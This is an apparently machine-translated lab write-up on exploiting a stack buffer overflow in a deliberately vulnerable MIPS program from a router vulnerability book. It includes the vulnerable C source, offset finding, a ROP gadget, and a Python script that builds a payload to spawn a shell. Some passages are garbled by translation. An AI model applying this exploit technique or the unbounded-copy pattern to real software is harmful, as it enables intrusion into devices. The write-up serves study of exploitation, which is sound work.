Article Directory
Preface
Recently, I was reading the book "Demystifying Home Router 0day Vulnerability Mining Technology". The most important thing to learn is to do it, so I reproduce and exploit the vulnerabilities according to what I have learned, and record the problems I encountered in the process.
surroundings
System: Ubuntu 16.04
Tools: IDA, QEMU
Configure the mips cross compilation environment
Vulnerability source code
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <string.h>
void do_system(int code,char *cmd)
{
char buf[255];
//sleep(1);
system(cmd);
}
int main()
{
char buf[256]={
0};
char ch;
int count = 0;
unsigned int fileLen = 0;
struct stat fileData;
FILE *fp;
if(0 == stat("passwd",&fileData))
fileLen = fileData.st_size;
else
return 1;
if((fp = fopen("passwd","rb")) == NULL)
{
printf("Cannot open file passwd!\n");
exit(1);
}
ch=fgetc(fp);
while(count <= fileLen)
{
buf[count++] = ch;
ch = fgetc(fp);
}
buf[--count] = '\x00';
if(!strcmp(buf,"adminpwd"))
{
do_system(count,"ls -l");
}
else
{
printf("you have an invalid password!\n");
}
fclose(fp);
return 0;
}
This is the case with the book's source code, the code function is very simple, from passwd
reading the password file, password adminpwd
when the password is correct, execute ls -l
the command, the password is wrong, print you have an invalid password!
.
However, we can find that when reading the password and assigning a value to buf, there is no control over the maximum length of buf that can be assigned, so a buffer overflow may occur.
Compiler
When compiling the program, I started using the Select mips-linux-gnu-gcc -static vuln_system.c -o vuln_system
command to compile, but unfortunately, such a compiled program generates an exception when IDA dynamic debugging of
this, asked a few brother, did not find a solution, only under Ubuntu configuration mips cross-compiler environment
to configure the environment, compiler, debugging normal dynamic
new passwd
file, enter the correct password adminpwd
, the program will invoke ls -l
the command, as shown
incorrect password is entered
Testing vulnerabilities
passwd
Write 600 characters A in the file, run the program, and find that the program crashes.
In order to determine the abnormal offset, use large ordered characters to test. For convenience, I use the script that comes with the book to generate characters.
Use IDA to dynamically debug the program.
You can see that the ordered characters have flooded the return address. The
current value of RA RA is 0x6E37416E , are translated into strings n7An
find strings are offset by 412 (0x19C)
offset in order to determine whether the found accurately, using the python generate the following string
python -c "print 'A'*412 + 'BBBB'" > passwd
continues dynamic debugging, found in RA collapse 0x42424242, description is to find the offset of
Exploit
Here we use command execution to exploit the vulnerability. There is a function in the program called do_system. From the code point of view, the do_system function can only execute ls -l
commands, but effective use of this can achieve the execution of arbitrary commands.
For this, we need to find an intermediate code block that can construct a function overflow and return. Calling the do_system function through the overflow vulnerability allows the do_system function to execute arbitrary commands. To construct a ROP chain, you first need to construct the parameters of the do-system function. Although do-system has two parameters, only the second parameter is actually used. According to the parameter passing method of the mips program, we know that the second parameter is passed using a 1, so as long as a1 is passed, so as long asA . 1 feed line transfer delivery , the order only to the a1 command string passed address.
Use IDA's python script plugin mipsrop.py to search and construct a suitable ROP chain
Through searching, I got an address 0x401F80 that can be constructed.
By looking at the address above, we can see that these two assembly sentences can be simplified to
addiu $a1,$sp,0x18
lw $ra,0x54
Through the above, you can simply construct the passwd file, fill in the address 0x401F80 at 0x19C, fill in the command string at the offset 0x18, and then call the do_system function (0x400370) at 0x54.
According to the above description, use the python script to construct
#!/usr/bin/env python
import struct
print '[*] prepare shellcode',
cmd = "sh"
cmd += "\x00"*(4 - (len(cmd) % 4))
#shellcode
shellcode = "A"*0x19C
shellcode += struct.pack(">L",0x00401F80)
shellcode += "A"*24
shellcode += cmd
shellcode += "B"*(0x3C - len(cmd))
shellcode += struct.pack(">L",0x00400370)
shellcode += "BBBB"
print ' ok!'
#create password file
print '[+] create password file',
fw = open('passwd','w')
fw.write(shellcode)
fw.close()
print ' ok!'
After generating the passwd file, execute the program and
you can see that it has been successfully used and can execute any command.
At this point, the exploitation of the buffer overflow vulnerability of the mips program has been completed.